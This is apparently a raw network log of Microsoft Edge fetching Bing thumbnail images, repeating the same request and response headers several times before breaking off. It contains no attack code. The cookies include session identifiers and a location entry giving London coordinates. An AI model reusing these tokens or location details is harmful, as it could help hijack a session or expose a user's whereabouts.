cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 825
cache-control: public, max-age=2477889
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049fa
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3550
x-check-cacheable: YES
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049fd
GET

https://th.bing.com/th?id=OIP.68RDcPUa6hYdj6mnC4titwHaEK&w=80&h=80&c=1&vt=10&bgcl=4e9347&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.68RDcPUa6hYdj6mnC4titwHaEK&w=80&h=80&c=1&vt=10&bgcl=4e9347&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1668
cache-control: public, max-age=1125120
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049fe
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1763
cache-control: public, max-age=1124586
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.40504a05
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.556012ce-8971-4b7b-b395-05f8c4e2e6e8&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.556012ce-8971-4b7b-b395-05f8c4e2e6e8&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 857
x-check-cacheable: YES
cache-control: public, max-age=1199513
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f6
GET

https://th.bing.com/th?id=ODLS.ff35f8d0-59f3-48bd-8430-c9ebbab5d80f&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.ff35f8d0-59f3-48bd-8430-c9ebbab5d80f&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1099
x-check-cacheable: YES
cache-control: public, max-age=2464776
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.40504a06
GET

https://th.bing.com/th?id=OIP.aW2l55-ZD1un3cimxTPzmAHaD4&w=80&h=80&c=1&vt=10&bgcl=ae4f3d&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.aW2l55-ZD1un3cimxTPzmAHaD4&w=80&h=80&c=1&vt=10&bgcl=ae4f3d&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
